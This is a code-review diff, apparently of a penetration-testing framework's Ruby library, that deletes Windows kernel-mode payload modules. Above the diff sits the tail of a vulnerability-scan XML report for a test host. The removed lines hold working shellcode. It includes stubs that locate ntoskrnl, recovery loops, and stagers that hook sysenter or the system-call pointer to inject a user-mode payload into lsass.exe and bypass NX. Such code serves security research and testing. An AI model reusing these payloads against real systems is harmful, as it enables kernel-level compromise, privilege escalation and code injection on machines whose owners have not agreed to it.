-	<hosts>
-		<host>
-			<ip>10.2.79.98</ip>
-			<netBIOSName>bsmith-10156B07C</netBIOSName>
-			<dnsName>bsmith-10156b07c.core.testcorp.com  random.testcorp.com</dnsName>
-			<mac>00:02:29:0E:38:2B</mac>
-			<os>Windows Server 2003 (X64), Service Pack 2</os>
-			<audit>
-				<rthID>7851</rthID>
-				<cve>CVE-2009-0089,CVE-2009-0550,CVE-2009-0086</cve>
-				<cce>N/A</cce>
-				<name>Microsoft Windows HTTP Services Multiple Vulnerabilities (960803)</name>
-				<description>Microsoft Windows HTTP Services contains multiple vulnerabilities when handling ..</description>
-				<date>09/15/2010</date>
-				<risk>Low</risk>
-				<pciLevel>5 (Urgent)</pciLevel>
-				<cvssScore>10 [AV:N/AC:L/Au:N/C:C/I:C/A:C]</cvssScore>
-				<fixInformation>....</fixInformation>
-			</audit>
-		</host>
-	</hosts>
-</scanJob>

data/lib/rex/payloads.rb DELETED Viewed

	@@ -1 +0,0 @@
1	- require 'rex/payloads/win32'

data/lib/rex/payloads/win32.rb DELETED Viewed

	@@ -1,2 +0,0 @@
1	- require 'rex/payloads/win32/common'
2	- require 'rex/payloads/win32/kernel'

data/lib/rex/payloads/win32/common.rb DELETED Viewed

@@ -1,26 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Common
-	#
-	# Returns a stub that resolves the location of a symbol and then
-	# calls it.  Refer to the following link for more details:
-	#
-	# http://uninformed.org/index.cgi?v=3&a=4&p=10
-	#
-	def self.resolve_call_sym
-		"\x60\x31\xc9\x8b\x7d\x3c\x8b\x7c\x3d\x78\x01\xef\x8b" +
-		"\x57\x20\x01\xea\x8b\x34\x8a\x01\xee\x31\xc0\x99\xac" +
-		"\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x41\x66\x39\xda" +
-		"\x75\xe3\x49\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" +
-		"\x5f\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
-		"\x61\xff\xe0"
-	end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel.rb DELETED Viewed

@@ -1,53 +0,0 @@
-module Rex
-module Payloads
-module Win32
-require 'rex/payloads/win32/kernel/common'
-require 'rex/payloads/win32/kernel/recovery'
-require 'rex/payloads/win32/kernel/stager'
-require 'rex/payloads/win32/kernel/migration'
-module Kernel
-	#
-	# Constructs a kernel-mode payload using the supplied options.  The options
-	# can be:
-	#
-	# Recovery      : The recovery method to use, such as 'spin'.
-	# Stager        : The stager method to use, such as 'sud_syscall_hook'.
-	# RecoveryStub  : The recovery stub that should be used, if any.
-	# UserModeStub  : The user-mode payload to execute, if any.
-	# KernelModeStub: The kernel-mode payload to execute, if any.
-	#
-	def self.construct(opts = {})
-		payload = nil
-		# Generate the recovery stub
-		if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
-			opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
-		end
-		# Append supplied recovery stub information in case there is some
-		# context specific recovery that must be done.
-		if opts['AppendRecoveryStub']
-			opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
-		end
-		# Generate the stager
-		if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
-			payload = Kernel::Stager.send(opts['Stager'], opts)
-		# Or, generate the migrator
-		elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
-			payload = Kernel::Migration.send(opts['Migrator'], opts)
-		else
-			raise ArgumentError, "A stager or a migrator must be specified."
-		end
-		payload
-	end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/common.rb DELETED Viewed

@@ -1,54 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-require 'rex/payloads/win32/common'
-#
-# This class provides common methods that may be shared across more than
-# one kernel-mode payload.  Many of these are from the following paper:
-#
-# http://www.uninformed.org/?v=3&a=4&t=sumry
-#
-module Common
-	#
-	# Returns a stub that will find the base address of ntoskrnl and
-	# place it in eax.  This method works by using an IDT entry.  Credit
-	# to eEye.
-	#
-	def self.find_nt_idt_eeye
-		"\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
-	end
-	#
-	# Returns a stub that will find the base address of ntoskrnl and
-	# place it in eax.  This method uses a pointer found in KdVersionBlock.
-	#
-	def self.find_nt_kdversionblock
-		"\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
-	end
-	#
-	# Returns a stub that will find the base address of ntoskrnl and
-	# place it in eax.  This method uses a pointer found in the
-	# processor control region as a starting point.
-	#
-	def self.find_nt_pcr
-		"\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
-	end
-	#
-	# Alias for resolving symbols.
-	#
-	def self.resolve_call_sym
-		Rex::Payloads::Win32::Common.resolve_call_sym
-	end
-end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/migration.rb DELETED Viewed

@@ -1,12 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-module Migration
-end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/recovery.rb DELETED Viewed

@@ -1,50 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-#
-# Recovery stubs are responsible for ensuring that the kernel does not crash.
-# They must 'recover' after the exploit has succeeded, either by consuming
-# the thread or continuing it on with its normal execution.  Recovery stubs
-# will often be exploit dependent.
-#
-module Recovery
-	#
-	# The default recovery method is to spin the thread
-	#
-	def self.default(opts = {})
-		spin(opts)
-	end
-	#
-	# Infinite 'hlt' loop.
-	#
-	def self.spin(opts = {})
-		"\xf4\xeb\xfd"
-	end
-	#
-	# Restarts the idle thread by jumping back to the entry point of
-	# KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
-	# You can pass the 'KiIdleLoopAddress' in the options hash.
-	#
-	def self.idlethread_restart(opts = {})
-		# Default to fully patched XPSP2
-		opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
-		"\x31\xC0" +                                     # xor eax,eax
-		"\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
-		"\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
-		"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
-		"\x6A\x00" +                                     # push byte +0x0
-		"\xFF\xE0"                                       # jmp eax
-	end
-end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/stager.rb DELETED Viewed

@@ -1,194 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-#
-# Stagers are responsible for reading in another payload and executing it.
-# The reading in of the payload may actually be as simple as copying it to
-# another location.  The executing of it may be done either directly or
-# indirectly.
-#
-module Stager
-	#
-	# Works on Vista, Server 2008 and 7.
-	#
-	# Full assembly source at:
-	# /msf3/external/source/shellcode/windows/x86/src/kernel/stager_sysenter_hook.asm
-	#
-	# This payload works as follows:
-	# * Our sysenter handler and ring3 stagers are copied over to safe location.
-	# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
-	# * The ring0 thread we are in is placed in a halted state.
-	# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
-	# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
-	# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
-	# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
-	# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
-	#
-	def self.stager_sysenter_hook( opts = {} )
-		# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
-		pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
-		# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
-		kstager   = opts['StagerAddressKernel'] || 0xFFDF0400
-		# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
-		ustager   = opts['StagerAddressUser'] || 0x7FFE0400
-		# Target SYSTEM process to inject ring3 payload into.
-		process   = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
-		# A simple hash of the process name based on the first 4 wide chars.
-		# Assumes process is located at '*:\windows\system32\'.
-		checksum  = process[0] + ( process[2] << 8 )  + ( process[1] << 16 ) + ( process[3] << 24 )
-		# The ring0 -> ring3 payload blob.
-		r0 =	"\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
-				"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
-				"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
-				"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
-				"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
-				"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
-				"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
-				"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
-				"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
-				"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
-				"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
-				"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
-				"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
-		# The ring3 payload.
-		r3  = ''
-		r3 += _createthread() if opts['CreateThread'] == true
-		r3 += opts['UserModeStub'] || ''
-		# Patch in the required values.
-		r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + r3.length - 0x1C ) ].pack("V") )
-		r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
-		r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
-		r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
-		r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
-		# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
-		return r0 + r3
-	end
-	#
-	# XP SP2/2K3 SP1 ONLY
-	#
-	# Returns a kernel-mode stager that transitions from r0 to r3 by placing
-	# code in an unused portion of SharedUserData and then pointing the
-	# SystemCall attribute to that unused portion.  This has the effect of
-	# causing the custom code to be called every time a user-mode process
-	# tries to make a system call.  The returned payload also checks to make
-	# sure that it's running in the context of lsass before actually running
-	# the embedded payload.
-	#
-	def self.sud_syscall_hook(opts = {})
-		r0_recovery = opts['RecoveryStub'] || Recovery.default
-		r3_payload  = opts['UserModeStub'] || ''
-		r3_prefix   = _run_only_in_win32proc_stub("\xff\x25\x08\x03\xfe\x7f", opts)
-		r3_size     = ((r3_prefix.length + r3_payload.length + 3) & ~0x3) / 4
-		r0_stager =
-			"\xEB" + [0x22 + r0_recovery.length].pack('C') + # jmp short 0x27
-			"\xBB\x01\x03\xDF\xFF"                         + # mov ebx,0xffdf0301
-			"\x4B"                                         + # dec ebx
-			"\xFC"                                         + # cld
-			"\x8D\x7B\x7C"                                 + # lea edi,[ebx+0x7c]
-			"\x5E"                                         + # pop esi
-			"\x6A" + [r3_size].pack('C')                   + # push byte num_dwords
-			"\x59"                                         + # pop ecx
-			"\xF3\xA5"                                     + # rep movsd
-			"\xBF\x7C\x03\xFE\x7F"                         + # mov edi,0x7ffe037c
-			"\x39\x3B"                                     + # cmp [ebx],edi
-			"\x74\x09"                                     + # jz
-			"\x8B\x03"                                     + # mov eax,[ebx]
-			"\x8D\x4B\x08"                                 + # lea ecx,[ebx+0x8]
-			"\x89\x01"                                     + # mov [ecx],eax
-			"\x89\x3B"                                     + # mov [ebx],edi
-			r0_recovery +
-			"\xe8" + [0xffffffd9 - r0_recovery.length].pack('V') + # call 0x2
-			r3_prefix +
-			r3_payload
-		return r0_stager
-	end
-protected
-	#
-	# Stub to run a prepended ring3 payload in a new thread.
-	#
-	# Full assembly source at:
-	# /msf3/external/source/shellcode/windows/x86/src/single/createthread.asm
-	#
-	def self._createthread
-		r3 =    "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-				"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-				"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-				"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-				"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-				"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-				"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-				"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-				"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-				"\x31\xC0\x50\x50\x50\x8D\x9D\xA0\x00\x00\x00\x53\x50\x50\x68\x38" +
-				"\x68\x0D\x16\xFF\xD5\xC3\x58"
-		return r3
-	end
-	#
-	# This stub is used by stagers to check to see if the code is
-	# running in the context of a user-mode system process.  By default,
-	# this process is lsass.exe.  If it isn't, it runs the code
-	# specified by append.  Otherwise, it jumps past that code and
-	# into what should be the expected r3 payload to execute.  This
-	# stub also makes sure that the payload does not run more than
-	# once.
-	#
-	def self._run_only_in_win32proc_stub(append = '', opts = {})
-		opts['RunInWin32Process'] = "lsass.exe" if opts['RunInWin32Process'].nil?
-		process  = opts['RunInWin32Process'].downcase
-		checksum =
-			process[0]         +
-			(process[2] << 8)  +
-			(process[1] << 16) +
-			(process[3] << 24)
-		"\x60"                                 + # pusha
-		"\x6A\x30"                             + # push byte +0x30
-		"\x58"                                 + # pop eax
-		"\x99"                                 + # cdq
-		"\x64\x8B\x18"                         + # mov ebx,[fs:eax]
-		"\x39\x53\x0C"                         + # cmp [ebx+0xc],edx
-		"\x74\x26"                             + # jz 0x5f
-		"\x8B\x5B\x10"                         + # mov ebx,[ebx+0x10]
-		"\x8B\x5B\x3C"                         + # mov ebx,[ebx+0x3c]
-		"\x83\xC3\x28"                         + # add ebx,byte +0x28
-		"\x8B\x0B"                             + # mov ecx,[ebx]
-		"\x03\x4B\x03"                         + # add ecx,[ebx+0x3]
-		"\x81\xF9" + [checksum].pack('V')      + # cmp ecx,prochash
-		"\x75\x10"                             + # jnz 0x5f
-		"\x64\x8B\x18"                         + # mov ebx,[fs:eax]
-		"\x43"                                 + # inc ebx
-		"\x43"                                 + # inc ebx
-		"\x43"                                 + # inc ebx
-		"\x80\x3B\x01"                         + # cmp byte [ebx],0x1
-		"\x74\x05"                             + # jz 0x5f
-		"\xC6\x03\x01"                         + # mov byte [ebx],0x1
-		"\xEB" + [append.length + 1].pack('C') + # jmp stager
-		"\x61" + append						        # restore regs
-	end
-end
-end
-end
-end
-end